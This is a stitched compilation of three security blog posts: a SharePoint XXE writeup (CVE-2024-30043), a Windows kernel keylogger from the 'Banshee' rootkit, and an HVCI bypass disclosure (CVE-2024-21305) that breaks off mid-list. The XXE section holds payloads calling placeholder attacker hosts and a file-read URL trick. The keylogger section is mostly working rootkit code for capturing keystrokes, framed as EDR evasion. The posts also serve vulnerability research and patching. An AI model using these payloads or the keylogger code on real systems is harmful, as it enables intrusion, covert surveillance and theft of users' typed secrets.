CVE-2024-30043: ABUSING URL PARSING CONFUSION TO EXPLOIT XXE ON SHAREPOINT SERVER AND CLOUD


Original text by Piotr Bazydło

Yes, the title is right. This blog covers an XML eXternal Entity (XXE) injection vulnerability that I found in SharePoint. The bug was recently patched by Microsoft. In general, XXE vulnerabilities are not very exciting in terms of discovery and related technical aspects. They may sometimes be fun to exploit and exfiltrate data (or do other nasty things) in real environments, but in the vulnerability research world, you typically find them, report them, and forget about them.

So why am I writing a blog post about an XXE? I have two reasons:

·       It affects SharePoint, both on-prem and cloud instances, which is a nice target. This vulnerability can be exploited by a low-privileged user.
·       This is one of the craziest XXEs that I have ever seen (and found), both in terms of vulnerability discovery and the method of triggering. When we talk about overall exploitation and impact, this Pwn2Own win by Chris Anastasio and Steven Seeley is still my favorite.

The vulnerability is known as CVE-2024-30043, and, as one would expect with an XXE, it allows you to:

·       Read files with SharePoint Farm Service account permission.
·       Perform Server-side request forgery (SSRF) attacks.
·       Perform NTLM Relaying.
·       Achieve any other side effects to which XXE may lead.

Let us go straight to the details.

BaseXmlDataSource DataSource

Microsoft.SharePoint.WebControls.BaseXmlDataSource is an abstract base class, inheriting from DataSource, for data source objects that can be added to a SharePoint Page. A DataSource can be included in a SharePoint page in order to retrieve data (in a way specific to a particular DataSource). When a BaseXmlDataSource is present on a page, its Execute method will be called at some point during page rendering:

protected XmlDocument Execute(string request) // [1]
{
    SPSite spsite = null;
    try
    {
        if (!BaseXmlDataSource.GetAdminSettings(out spsite).DataSourceControlEnabled)
        {
            throw new DataSourceControlDisabledException(SPResource.GetString("DataSourceControlDisabled", new object[0]));
        }
        string text = this.FetchData(request); // [2]
        if (text != null && text.Length > 0)
        {
            XmlReaderSettings xmlReaderSettings = new XmlReaderSettings();
            xmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit; // [3]
            XmlTextReader xmlTextReader = new XmlTextReader(new StringReader(text));
            XmlSecureResolver xmlResolver = new XmlSecureResolver(new XmlUrlResolver(), request); // [4]
            xmlTextReader.XmlResolver = xmlResolver; // [5]
            XmlReader xmlReader = XmlReader.Create(xmlTextReader, xmlReaderSettings); // [6]
            try
            {
                do
                {
                    xmlReader.Read(); // [7]
                }
                while (xmlReader.NodeType != XmlNodeType.Element);
            }
            ...
        }
        ...
    }
    ...
}

At [1], you can see the Execute method, which accepts a string called request. We fully control this string, and it should be a URL (or a path) pointing to an XML file. Later, I will refer to this string as DataFile.

At this point, we can divide this method into two main parts: XML fetching and XML parsing.

       a) XML Fetching

At [2], this.FetchData is called and our URL is passed as an input argument. BaseXmlDataSource does not implement this method (it’s an abstract class).

FetchData is implemented in three classes that extend our abstract class:
• SoapDataSource — performs an HTTP SOAP request and retrieves a response (XML).
• XmlUrlDataSource — performs a customizable HTTP request and retrieves a response (XML).
• SPXmlDataSource — retrieves an existing specified file on the SharePoint site.

We will revisit those classes later.

       b) XML Parsing

At [3], the xmlReaderSettings.DtdProcessing member is set to DtdProcessing.Prohibit, which should disable the processing of DTDs.

At [4] and [5], the xmlTextReader.XmlResolver is set to a freshly created XmlSecureResolver. The request string, which we fully control, is passed as the securityUrl parameter when creating the XmlSecureResolver.

At [6], the code creates a new instance of XmlReader.

Finally, it reads the contents of the XML using a do-while loop at [7].

At first glance, this parsing routine seems correct. The document type definition (DTD) processing of our XmlReaderSettings instance is set to Prohibit, which should block all DTD processing. On the other hand, we have the XmlResolver set to XmlSecureResolver.

From my experience, it is very rare to see .NET code where:
• DTDs are blocked through XmlReaderSettings.
• Some XmlResolver is still defined.

I decided to play around and threw a general entity-based payload at some test code I wrote, similar to the code shown above (I only replaced XmlSecureResolver with XmlUrlResolver for testing purposes):

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY b SYSTEM "http://attacker/poc.txt">
]>
<r>&b;</r>

As expected, no HTTP request was performed, and a DTD processing exception was thrown. What about this payload?

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM "http://attacker/poc.xml">
%sp;
]>
<a>wat</a>

It was a massive surprise to me, but the HTTP request was performed! According to that, it seems that when you have .NET code where:
• XmlReader is used with XmlTextReader and XmlReaderSettings,
• XmlReaderSettings.DtdProcessing is set to Prohibit, and
• an XmlTextReader.XmlResolver is set,

the resolver will first try to handle the parameter entities, and only afterwards perform the DTD prohibition check! An exception will be thrown in the end, but it still allows you to exploit the Out-of-Band XXE and potentially exfiltrate data (using, for example, an HTTP channel).
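To make this easy to reproduce outside of SharePoint, my standalone test harness looked roughly like the sketch below (a simplified approximation, with XmlUrlResolver standing in for XmlSecureResolver as mentioned above, and http://attacker/poc.xml being a placeholder):

using System;
using System.IO;
using System.Xml;

class XxeRepro
{
    static void Main()
    {
        // The parameter entity payload shown above.
        const string xml = @"<?xml version=""1.0"" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM ""http://attacker/poc.xml"">
%sp;
]>
<a>wat</a>";

        XmlReaderSettings settings = new XmlReaderSettings();
        settings.DtdProcessing = DtdProcessing.Prohibit;

        XmlTextReader textReader = new XmlTextReader(new StringReader(xml));
        textReader.XmlResolver = new XmlUrlResolver(); // stand-in for XmlSecureResolver

        using (XmlReader reader = XmlReader.Create(textReader, settings))
        {
            try
            {
                while (reader.Read()) { } // the outbound request for %sp; is made here...
            }
            catch (XmlException e)
            {
                Console.WriteLine(e.Message); // ...and the DTD-prohibited exception still follows
            }
        }
    }
}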

The XXE is there, but we have to solve two mysteries:

• How can we properly fetch the XML payload in SharePoint?
• What’s the deal with this XmlSecureResolver?

XML Fetching and XmlSecureResolver

As I have already mentioned, there are three classes that extend our vulnerable BaseXmlDataSource. Their FetchData method is used to retrieve the XML content based on our URL. Then, this XML will be parsed with the vulnerable XML parsing code.

Let’s summarize those 3 classes:

       a) XmlUrlDataSource
       • Accepts URLs with a protocol set to either http or https.
       • Performs an HTTP request to fetch the XML content. This request is customizable. For example, we can select which HTTP method we want to use.
       • Some SSRF protections are implemented. This class won’t allow you to make HTTP requests to local addresses such as 127.0.0.1 or 192.168.1.10. Still, you can use it freely to reach external IP address space.

       b) SoapDataSource
       • Almost identical to the first one, although it allows you to perform SOAP requests only (the body must contain valid XML, plus additional restrictions).
       • The same SSRF protections exist as in XmlUrlDataSource.

       c) SPXmlDataSource
       • Allows retrieval of the contents of SharePoint pages or documents. If you have a file test.xml uploaded to the sample site, you can provide a URL as follows: /sites/sample/test.xml.

At this point, those HTTP-based classes look like a great match. We can:
• Create an HTTP server.
• Fetch malicious XML from our server.
• Trigger XXE and potentially read files from SharePoint server. 

Let’s test this. I’m creating an XmlUrlDataSource, and I want it to fetch the XML from this URL:

       http://attacker.com/poc.xml

poc.xml contains the following payload:

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM "http://localhost/test">
%sp;
]>

The plan is simple. I want to test the XXE by executing an HTTP request to the localhost (SSRF). 

We must also remember that whatever URL we specify as our source also becomes the securityUrl of the XmlSecureResolver. Accordingly, this is what will be executed:

Figure 1 XmlSecureResolver initialization
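In code terms, the figure boils down to something like this (the variable names are mine):

// request == "http://attacker.com/poc.xml", i.e. the DataFile URL we supplied
XmlSecureResolver xmlResolver = new XmlSecureResolver(new XmlUrlResolver(), "http://attacker.com/poc.xml");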

Who cares anyway? YOLO and let’s move along with the exploitation. Unfortunately, this is the exception that appears when we try to execute this attack:

The action that failed was:
Demand
The type of the first permission that failed was:
System.Net.WebPermission
The first permission that failed was: <IPermission class="System.Net.WebPermission, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" version="1">
<ConnectAccess>
<URI uri="http://localhost/test"/>
</ConnectAccess>
</IPermission>

Figure 2 Exception thrown during XXE->SSRF

It seems that “Secure” in XmlSecureResolver stands for something. In general, it is a wrapper around various resolvers, which allows you to apply some resource-fetching restrictions. Here is a fragment of the Microsoft documentation:

“Helps to secure another implementation of XmlResolver by wrapping the XmlResolver object and restricting the resources that the underlying XmlResolver has access to.”

In general, it is based on Microsoft Code Access Security. Depending on the provided URL, it creates some resource access rules. Let’s see a simplified example for http://attacker.com/test.xml:

Figure 3 Simplified sample restrictions applied by XmlSecureResolver

In short, it creates restrictions based on protocol, hostname, and a couple of different things (like an optional port, which is not applicable to all protocols). If we fetch our XML from http://attacker.com, we won’t be able to make a request to http://localhost, because the host does not match.

The same goes for the protocol. If we fetch XML from the attacker’s HTTP server, we won’t be able to access local files with XXE, because neither the protocol (http:// versus file://) nor the host match as required.

To summarize, this XXE is useless so far. Even though we can technically trigger the XXE, it only allows us to reach our own server, which we can also achieve with the intended functionalities of our SharePoint sources (such as XmlUrlDataSource). We need to figure out something else.

SPXmlDataSource and URL Parsing Issues

At this point, I was not able to abuse the HTTP-based sources. I tried to use SPXmlDataSource with the following request:

       /sites/mysite/test.xml

The idea is simple. We are a SharePoint user, and we can upload files to some sites. We upload our malicious XML to the http://sharepoint/sites/mysite/test.xml document and then we:
       • Create an SPXmlDataSource.
       • Set DataFile to /sites/mysite/test.xml.

SPXmlDataSource will successfully retrieve our XML. What about XmlSecureResolver? Unfortunately, such a path (without a protocol) will lead to a very restrictive policy, which does not allow us to leverage this XXE.

It made me wonder about the URL parsing. I knew that I could not abuse the HTTP-based XmlUrlDataSource and SoapDataSource. The code was written in C# and it was pretty straightforward to read – URL parsing looked good there. On the other hand, the URL parsing of SPXmlDataSource is performed by some unmanaged code, which cannot be easily decompiled and read.

I started thinking about the following potential exploitation scenario:
       • Delivering a “malformed” URL.
       • SPXmlDataSource somehow manages to handle this URL, and retrieves my uploaded XML successfully.
       • The URL gives me an unrestricted XmlSecureResolver policy and I’m able to fully exploit the XXE.

This idea seemed good, and I decided to investigate the possibilities. First, we have to figure out when XmlSecureResolver gives us a nice policy, which allows us to:
       • Access the local file system (to read file contents).
       • Perform HTTP communication to any server (to exfiltrate data).

Let’s deliver the following URL to XmlSecureResolver:

       file://localhost/c$/whatever

Bingo! XmlSecureResolver creates a policy with no restrictions! It thinks that we are loading the XML from the local file system, which means that we probably already have full access, and we can do anything we want.
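For intuition, here is a rough sketch (my own test code, not SharePoint’s) of how the evidence differs between the two URL shapes, using the public XmlSecureResolver.CreateEvidenceForUrl helper, which, as far as I can tell, is what the string-based constructor uses under the hood:

using System;
using System.Security.Policy;
using System.Xml;

class EvidenceComparison
{
    static void Main()
    {
        // The evidence (and therefore the CAS policy) is derived purely from the URL string
        // that was also used to fetch the XML.
        Evidence httpEvidence = XmlSecureResolver.CreateEvidenceForUrl("http://attacker.com/poc.xml");
        Evidence fileEvidence = XmlSecureResolver.CreateEvidenceForUrl("file://localhost/c$/whatever");

        // Dumping the evidence objects shows the difference: the http URL yields Internet-zone
        // evidence tied to attacker.com (hence the WebPermission Demand failure shown earlier),
        // while the file URL is treated as local content and ends up effectively unrestricted.
        foreach (object o in httpEvidence) Console.WriteLine(o);
        foreach (object o in fileEvidence) Console.WriteLine(o);
    }
}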

Such a URL is not something that we should be able to deliver to SPXmlDataSource or any other data source that we have available. None of them is based on the local file system, and even if they were, we would not be able to upload files there.

Still, we don’t know how SPXmlDataSource handles URLs. Maybe my dream attack scenario with a malformed URL is possible? Before even trying to reverse the appropriate function, I started playing around with this SharePoint data source, and surprisingly, I found a solution quickly:

       file://localhost\c$/sites/mysite/test.xml

Let’s see how SPXmlDataSource handles it (based on my observations):

Figure 4 SPXmlDataSource — handling of malformed URL

This is awesome. Such a URL allows us to retrieve the XML that we can freely upload to SharePoint. On the other hand, it gives us an unrestricted access policy in XmlSecureResolver! This URL parsing confusion between those two components gives us the possibility to fully exploit the XXE and perform a file read.

The entire attack scenario looks like this:

Figure 5 SharePoint XXE — entire exploitation scenario

Demo

Let’s have a look at the demo to visualize things better. It presents the full exploitation process, together with the debugger attached. You can see that:
       • SPXmlDataSource fetches the malicious XML file, even though the URL is malformed.
       • XmlSecureResolver creates an unrestricted access policy.
       • XXE is exploited and we retrieve the win.ini file.
       • The “DTD prohibited” exception is eventually thrown, but we were still able to abuse the OOB XXE.

The Patch

The patch from Microsoft implemented two main changes:
       • More URL parsing controls for SPXmlDataSource.
       • The XmlTextReader object also prohibits DTD usage (previously, only XmlReaderSettings did that).

In general, I find .NET XXE-protection settings way trickier than the ones that you can define in various Java parsers. This is because you can apply them to objects of different types (here: XmlReaderSettings versus XmlTextReader). When XmlTextReader prohibits DTD usage, parameter entities seem to never be resolved, even with a resolver specified (that’s how this patch works). On the other hand, when XmlReaderSettings prohibits DTDs, parameter entities are resolved when the XmlUrlResolver is used. You can easily get confused here.
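To illustrate the difference, here is a short sketch (my own snippet, not the patched SharePoint code) of the two places where DTD processing can be prohibited:

using System.IO;
using System.Xml;

string xml = File.ReadAllText("input.xml"); // any untrusted XML

// Reader-level prohibition: with DtdProcessing set on the XmlTextReader itself,
// parameter entities are not resolved, even though a resolver is still attached.
XmlTextReader textReader = new XmlTextReader(new StringReader(xml));
textReader.DtdProcessing = DtdProcessing.Prohibit;
textReader.XmlResolver = new XmlUrlResolver();

// Settings-level prohibition alone (the pre-patch pattern) still lets the resolver
// fetch parameter entities before the prohibition check fires.
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;

XmlReader reader = XmlReader.Create(textReader, settings);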

Summary

A lot of us thought that XXE vulnerabilities were almost dead in .NET. Still, it seems that you may sometimes spot some tricky implementations and corner cases that may turn out to be vulnerable. A careful review of .NET XXE-related settings is not an easy task (they are tricky) but may eventually be worth a shot.

I hope you liked this writeup. I have a huge line of upcoming blog posts, but vulnerabilities are waiting for the patches (including one more SharePoint vulnerability). Until my next post, you can follow me @chudypb and follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.

Keylogging in the Windows Kernel with undocumented data structures


Original text by eversinc33

If you are into rootkits and offensive Windows kernel driver development, you have probably watched the talk Close Encounters of the Advanced Persistent Kind: Leveraging Rootkits for Post-Exploitation, by Valentina Palmiotti (@chompie1337) and Ruben Boonen (@FuzzySec), in which they talk about using rootkits for offensive operations. I do believe that rootkits are the future of post-exploitation and EDR evasion — EDR is getting tougher to evade in userland, and Windows drivers are full of vulnerabilities which can be exploited to deploy rootkits. One part of this talk, however, particularly caught my interest: around the 16-minute mark, Valentina talks about kernel mode keylogging. She describes the abstract process of how they achieve this in their rootkit as follows:

The basic idea revolves around gafAsyncKeyState (gaf = global af?), which is an undocumented kernel structure in win32kbase.sys used by NtUserGetAsyncKeyState (this structure exists up to Windows 10 — more on that at the end or in the talk linked above).

By first locating and then parsing this structure, we can read keystrokes the way that NtUserGetAsyncKeyState does, without calling any APIs at all.

As always, game cheaters have been ahead of the curve, since they have been battling in the kernel with anticheats for a long time. One thread explaining this technique dates back to 2019 for example.

In the talk, they also give the idea to map this memory into a usermode virtual address, to then poll this memory from a usermode process. I roughly implemented their approach, but skipped this memory mapping part, as in my rootkit Banshee (for now) I might as well read from the kernel directly. In this short post I want to give an idea about how I approached the implementation with the guideline from the talk.

Implementation

The first challenge is of course to locate gafAsyncKeyState. Since the offset of gafAsyncKeyState in relation to the win32kbase.sys base address is different across versions of Windows, we have to resolve it dynamically. One common technique is to look for a function that accesses it in some instruction, find that instruction and then read out the target address.

Signature scanning

We know that NtUserGetAsyncKeyState needs to access this array. We can verify this by looking at the disassembly of NtUserGetAsyncKeyState in IDA and spotting a reference to our target structure, next to a MOV rax qword ptr instruction.

This is the first MOV rax qword ptr since the beginning of the function — thus we can locate it by simply scanning for the first occurrence of the bytes corresponding to that instruction (starting from the function’s beginning) and reading the offset from the operand.

The MOV rax qword ptr instruction is represented in bytes as follows:

0x48 0x8B 0x05 ["32 bit offset"];

So if we find that pattern and extract the offset, we can calculate the address of our target structure, gafAsyncKeyState.

Code for finding such a pattern in C++ is simple. You (and I, lol) should probably write a signature scanning engine, since this is a common task in a rootkit that deals with dynamic offsets, but for now a naive implementation shall suffice. However, there is one more hurdle.

Session driver address space

If we try to access the memory of win32kbase with WinDbg attached to our kernel, we will see that (usually) we are not able to read the memory at that address.

This is because the win32kbase.sys driver is a session driver and operates in session space, a special area of system memory that is only readable through a process running in a session. This makes sense, as keystrokes should be handled differently for every user that has a session connected.

Thus, to access this memory, we will first have to attach to a process running in the target session. In WinDbg, this is possible with the !session command. In our driver, we will have to call KeStackAttachProcess, and afterwards, KeUnstackDetachProcess.

A common process to choose is winlogon.exe, as you can be sure it is always running and attached to a session. Another common choice seems to be csrss.exe, but make sure to choose the right one, as only one of the two commonly running instances runs in a session context.

Putting it all together, here we have simple code to resolve the address of gafAsyncKeyState. Error handling is omitted for brevity, and some functions (e.g. GetSystemRoutineAddress, LOG_MSG or GetPidFromProcessName) are my own implementations, but they should be trivial to recreate and are self-explanatory. Otherwise you can look them up in Banshee:

PVOID Resolve_gafAsyncKeyState()
{
    KAPC_STATE apc;
    PVOID address = 0;
    PEPROCESS targetProc = 0;

    // Resolve winlogon's PID
    UNICODE_STRING processName;
    RtlInitUnicodeString(&processName, L"winlogon.exe");
    HANDLE procId = GetPidFromProcessName(processName); 
    PsLookupProcessByProcessId(procId, &targetProc);
        
    // Get Address of NtUserGetAsyncKeyState
    DWORD64 ntUserGetAsyncKeyState = (DWORD64)GetSystemRoutineAddress(Win32kBase, "NtUserGetAsyncKeyState");

    // Attach to winlogon.exe to enable reading of session space memory
    KeStackAttachProcess(targetProc, &apc);

    // Starting from NtUserGetAsyncKeyState, look for our byte signature
    INT i;
    for (i = 0; i < 500; ++i)
    {
        if (
            *(BYTE*)(ntUserGetAsyncKeyState + i)     == 0x48 &&
            *(BYTE*)(ntUserGetAsyncKeyState + i + 1) == 0x8b &&
            *(BYTE*)(ntUserGetAsyncKeyState + i + 2) == 0x05
        )
        {
            // MOV rax qword ptr instruction found!
            // The 32bit param is the offset from the next instruction to the address of gafAsyncKeyState
            UINT32 offset = (*(PUINT32)(ntUserGetAsyncKeyState + i + 3));
            // Calculate the address: the address of NtUserGetAsyncKeyState + our current offset while scanning + 4 bytes for the 32bit parameter itself + the offset parsed from the parameter = our target address
            address = (PVOID)(ntUserGetAsyncKeyState + (i + 3) + 4 + offset); 
            break;
        }
    }

    LOG_MSG("Found address to gafAsyncKeyState at offset [NtUserGetAsyncKeyState]+%i: 0x%llx\n", i, address);

    // Detach from the process
    KeUnstackDetachProcess(&apc);
    
    ObDereferenceObject(targetProc);
    return address;
}

With the address of our structure of interest, we now just need to find out how we can parse it.

Parsing keystrokes

While I first started to reverse engineer NtUserGetAsyncKeyState in Ghidra, it came to my mind that folks way smarter than me had already done that, so I looked up the function in ReactOS.

Here, we can see how this function simply accesses the gafAsyncKeyState array with the IS_KEY_DOWN macro to determine if a key is pressed, according to its Virtual Key-Code.

The IS_KEY_DOWN macro simply checks if the bit corresponding to the virtual key-code is set and returns TRUE if it is. So our structure, gafAsyncKeyState, is simply an array of bits that correspond to the states of our keys.

All that is left now is to copy and paste these macros and implement some basic polling logic (what key is down, was it down last time, …).

// https://github.com/mirror/reactos/blob/c6d2b35ffc91e09f50dfb214ea58237509329d6b/reactos/win32ss/user/ntuser/input.h#L91
#define GET_KS_BYTE(vk) ((vk) * 2 / 8)
#define GET_KS_DOWN_BIT(vk) (1 << (((vk) % 4)*2))
#define GET_KS_LOCK_BIT(vk) (1 << (((vk) % 4)*2 + 1))
#define IS_KEY_DOWN(ks, vk) (((ks)[GET_KS_BYTE(vk)] & GET_KS_DOWN_BIT(vk)) ? TRUE : FALSE)
#define SET_KEY_DOWN(ks, vk, down) (ks)[GET_KS_BYTE(vk)] = ((down) ? \
                                                            ((ks)[GET_KS_BYTE(vk)] | GET_KS_DOWN_BIT(vk)) : \
                                                            ((ks)[GET_KS_BYTE(vk)] & ~GET_KS_DOWN_BIT(vk)))

UINT8 keyStateMap[64] = { 0 };
UINT8 keyPreviousStateMap[64] = { 0 };
UINT8 keyRecentStateMap[64] = { 0 };

VOID UpdateKeyStateMap(const HANDLE& procId, const PVOID& gafAsyncKeyStateAddr)
{
    // Save the previous state of the keys
    memcpy(keyPreviousStateMap, keyStateMap, 64);

    // Copy over the array into our buffer
    SIZE_T size = 0;
    MmCopyVirtualMemory(
        BeGetEprocessByPid(HandleToULong(procId)),
        gafAsyncKeyStateAddr,
        PsGetCurrentProcess(), 
        &keyStateMap,
        sizeof(UINT8[64]),
        KernelMode,
        &size
    );

    // for each keycode ...
    for (auto vk = 0u; vk < 256; ++vk) 
    {
        // ... if key is down but wasn't previously, set it in the recent-state-map as down
        if (IS_KEY_DOWN(keyStateMap, vk) && !(IS_KEY_DOWN(keyPreviousStateMap, vk)))
        {
            SET_KEY_DOWN(keyRecentStateMap, vk, TRUE);
        }
    }
}

BOOLEAN
WasKeyPressed(UINT8 vk)
{
    // Check if a key was pressed since last polling the key state
    BOOLEAN result = IS_KEY_DOWN(keyRecentStateMap, vk);
    SET_KEY_DOWN(keyRecentStateMap, vk, FALSE);
    return result;
}
    

Then, we can call WasKeyPressed at a regular interval to poll for keystrokes and process them in any way we like:

#define VK_A 0x41

VOID KeyLoggerFunction()
{
    while (true)
    {
        UpdateKeyStateMap(procId, gafAsyncKeyStateAddr);

        // POC: just check if A is pressed
        if (WasKeyPressed(VK_A))
        {
            LOG_MSG("A pressed\n");
        }

        // Sleep for 0.1 seconds
        LARGE_INTEGER interval;
        interval.QuadPart = -1 * (LONGLONG)100 * 10000; 
        KeDelayExecutionThread(KernelMode, FALSE, &interval);
    }
}

Logging a keystroke to the kernel debug log works as a simple PoC for the technique — whenever the A key is pressed, we get a debug log in WinDbg.

You can read the messy code at https://github.com/eversinc33/Banshee.

Some more things to do or look out for are:

  • Implement it for Windows >= 11 — the structure is the same, it is just named differently and needs to be dereferenced a few times to reach the array
  • If you are interested, go with the approach mentioned by Valentina, mapping the structure into usermode to read it from there

Happy Hacking!

Hunting down the HVCI bug in UEFI


Original text by Satoshi’s notes


This post was coauthored with Andrea Allievi (@aall86), a Windows Core OS engineer who analyzed and fixed the issue.


This post details the story and technical details of the non-secure Hypervisor-Protected Code Integrity (HVCI) configuration vulnerability disclosed and fixed with the January 9th update on Windows. This vulnerability, CVE-2024-21305, allowed arbitrary kernel-mode code execution, effectively bypassing HVCI within the root partition.

While analysis of the HVCI bypass bug alone can be interesting enough, Andrea and I found that the process of root causing and fixing it would also be fun to detail, and we decided to write this up together. The first half of this article was authored by me, and the second half by Andrea. Readers can expect a great deal of Windows internals and x64 architecture details thanks to Andrea’s contribution!

Discovery to reporting

Discovery

The discovery of the bug was one of the by-products of hvext.js, the Windbg extension for studying the implementation of Hyper-V on Intel processors. With the extension, I dumped EPT on a few devices to better understand the implementation of HVCI, and one of them showed readable, writable, and kernel-mode executable (later referred to as RWX) guest physical addresses (GPAs). When HVCI is enabled, such GPAs should not exist as it would allow generation and execution of arbitrary code in kernel-mode. Eventually, out of 7 Intel devices I had, I found 3 devices with this issue, ranging from 6th to 10th generation processors.

Exploitation

Exploiting this issue for a verification purpose was trivial as the RWX GPAs did not change across reboot or when test-signing was enabled. I wrote the driver that remapped a choice of linear address onto one of RWX GPAs and placed shellcode there, and was able to execute the shellcode as expected! If HVCI were working as intended, the PoC driver would have failed to write shellcode and caused a bug check. For more details on the PoC, see the report on GitHub.

I asked Andrea about this and was told it could be a legit issue.

Partial root causing

I was curious why the issue was seen on only some devices and started to investigate what the RWX GPAs were.

Contents of those GPAs all seemed zero during runtime, and RamMap indicated it was outside NTOS-managed memory. I dumped memory during the Winload debug session, but they were still vastly zero. It was the same even during the UEFI shell phase.

At this point, I thought it might be UEFI-reserved regions. First, I realized that the RWX GPAs were parts of Reserved regions but did not exactly match, per the output of the memmap UEFI shell command. Shortly after, I discovered the regions exactly corresponded to the ranges reported by the Reserved Memory Region Reporting (RMRR) structure in the DMAR ACPI table.
I spent more time trying to understand why they were marked as RWX and why it occurred on only some machines. Eventually, I could not get the answers, but I was already reasonably satisfied with my findings and decided to hand this over to MSFT.

Reporting

I sent an initial write-up to Andrea, then, an updated one to MSRC a few days later. Though, it turned out that Andrea was the engineer in charge of this case. Such a small world.

Nothing much happened until mid-October when Andrea privately let me know he root caused and fixed it, and also offered to write up technical details from his perspective.

So the following is his write-up with a lot of technical details!

Technical details and fixes

Intel VT-x and its limitation

So what is the DMAR table, and why was it important in this bug?

To understand it, we should take a step back and briefly introduce one of the first improvements of the Intel Virtualization Extension (Intel VT-x). Indeed, Intel VT-x was introduced back around the year 2004 and, in its initial implementation, it missed some parts of the technology that are currently used in modern Operating Systems (in 2023). In particular:

  1. The specifications did not include a hardware Stage-2 MMU able to perform the translation of Guest Physical Addresses (GPAs) to System Physical Addresses (SPAs). The first hypervisors (like VMware) were using a technique called Memory Shadowing.
  2. Similarly, the specification did not protect devices performing DMA to system memory addresses.

As the reader can imagine, this was not compatible with the security standards required nowadays, so multiple “addendums” were added to the first implementation. While in this article we are not talking about #1 (plenty of articles are available online, like this one), we will give a short introduction and description of the Intel VT-d technology, which aims at protecting device data transfers initiated via DMA.

Intel VT-d

Intel maintains the VT-d technology specifications at the following URL: https://www.intel.com/content/www/us/en/content-details/774206/intel-virtualization-technology-for-directed-i-o-architecture-specification.html

The document is updated quite often (at the time of this writing, we are at revision 4.1) and explains how an I/O memory management unit (IOMMU) can prevent devices from accessing memory that belongs to another VM or is reserved for the host Hypervisor or OS.

A device can be exposed by the Hypervisor in different ways:

  • Emulated devices always cause a VMEXIT and they are emulated by a component in the Virtualization stack.
  • Paravirtualized devices are synthetic devices that communicate with the host device through a technology implemented in the Host Hypervisor (VmBus in case of HyperV).
  • Hardware accelerated devices are mapped directly in the VM. (readers who want to know more can check Chapter 9 of the Windows Internals book).

All the hardware devices are directly mapped in the root partition by the HV. To correctly support hardware accelerated devices in a child VM, the HV needs an IOMMU. But what exactly is an IOMMU? To be able to isolate and restrict device accesses to just the resources owned by the VM (or by the root partition), an IOMMU should provide the following capabilities:

  • I/O device assignment
  • DMA remapping to support address translations for Direct Memory Accesses (DMA) initiated by the devices
  • Interrupt remapping and posting for supporting isolation and routing of interrupts to the appropriate VM

DMA remapping

The DMA remapping capability is the feature related to the bug found in the Hypervisor. Indeed, to properly isolate DMA requests coming from hardware devices, an IOMMU must translate requests coming from the endpoint device attached to the Root Complex (in its simplest form, a DMA request is composed of a target DMA address/size and an originating device ID specified as Bus/Dev/Function — BDF) to the corresponding Host Physical Address (HPA).

Note that readers that do not know what a Root Complex is or how the PCI-Ex devices interact with the system memory bus can read the excellent article by Gbps located here (he told me that a part 2 is coming soon 🙂 ).

The IOMMU defines the Domain concept: an isolated environment in the platform for which a subset of host physical memory is allocated (basically a bunch of isolated physical memory pages). The isolation property of a domain is achieved by blocking access to its physical memory from resources not assigned to it. Software creates and manages domains, allocates the backing physical memory (SPAs), and sets up the DMA address translation function using “Device-to-Domain Mapping” and “Hierarchical Address translation” structures.

Skipping a lot of details, both structures can be thought of as “special” page tables:

  • Device-to-Domain Mapping structures are addressed by the BDF of the source device. In the Intel manual this is called the “Source ID”, and the lookup yields back the domain ID and the root Address Translation structures for the domain (yes, entries in this table are indeed 128 bits, not 64).
  • Hierarchical Address translation structures are addressed by the source DMA address, which is treated as a GPA, and output the final Host Physical Address used as the target for the DMA transfer.

The concepts above are described by the following figure (source: Intel Manual):

DMAR ACPI table and RMRR structure

The architecture defines that any IOMMU present in the system must be detected by the BIOS and announced via an ACPI table, called DMA Remapping Reporting (DMAR). The DMAR is composed of multiple remapping structures. For example, an IOMMU is reported with the DMA Remapping Unit Definition (DRHD) structure. Describing all of them is beyond the scope of this article.

What if a device always needs to perform DMA transfer with specific memory regions? Certain devices, like the Network controller, when used for debugging (for example in KDNET), or the USB controller, when used for legacy Keyboard emulation in the BIOS, should always be able to perform DMA both before and after setting up IOMMU. For these kinds of devices, the Reserved Memory Region Reporting (RMRR) structure is used by the BIOS to describe regions of memory where the DMA should always be possible.

Two important concepts described in the Intel manual regarding the RMRR structure:

  1. The BIOS should report physical memory described in the RMRR as Reserved in the UEFI memory map.
  2. When the OS enables DMA remapping, it should set up the Second-stage address translation structures for mapping the physical memory described by the RMRR using the “identity mapping” with read and write (RW) permission (meaning that GPA X is mapped to HPA X).

Interaction with Windows, and the bug

In some buggy machines, consideration #1 was not happening, meaning that neither the HV nor the Secure Kernel knows about this memory range from the UEFI memory map.

When booting, the Hypervisor initializes its internal state, creates the Root partition (again, details are in the Windows Internals book) and performs the IOMMU initialization in multiple phases. On AMD64 machines, one of these phases requires parsing the RMRR. Note that the HV still has no idea whether the system will enable VBS/HVCI or not, so it has no options other than applying the full identity mapping to the range (which implies RWX protection).

When the Secure Kernel later starts and determines that HVCI should be enabled, it will set the new “default VTL permission” to be RW (but not Execute) and will inform the hypervisor by setting the public HvRegisterVsmPartitionConfig synthetic MSR (documented in the Hypervisor TLFS). When VTL 1 of the target partition sets the default VTL protection and writes to the HvRegisterVsmPartitionConfig MSR, it causes a VMEXIT to the Hypervisor, which cycles between each valid Guest physical frame described in the UEFI memory map and mapped in the VTL 0 SLAT, removing the “Execute” permission bit (as dictated by the “DefaultVtlProtectionMask” field of the synthetic register).

Mindful readers can already understand what is going wrong here. On buggy firmware, where the RMRR region is not reported in the UEFI memory map, this process leaves the “Execute” protection of the described region on, producing an HVCI violation (thanks Satoshi).

Fixes

MSFT has fixed the issue (thanks Andrea) by working on two separate fronts:

  1. Fixing the firmware in all the commercial devices MSFT released, forcing the RMRR memory region to be included in the UEFI memory map
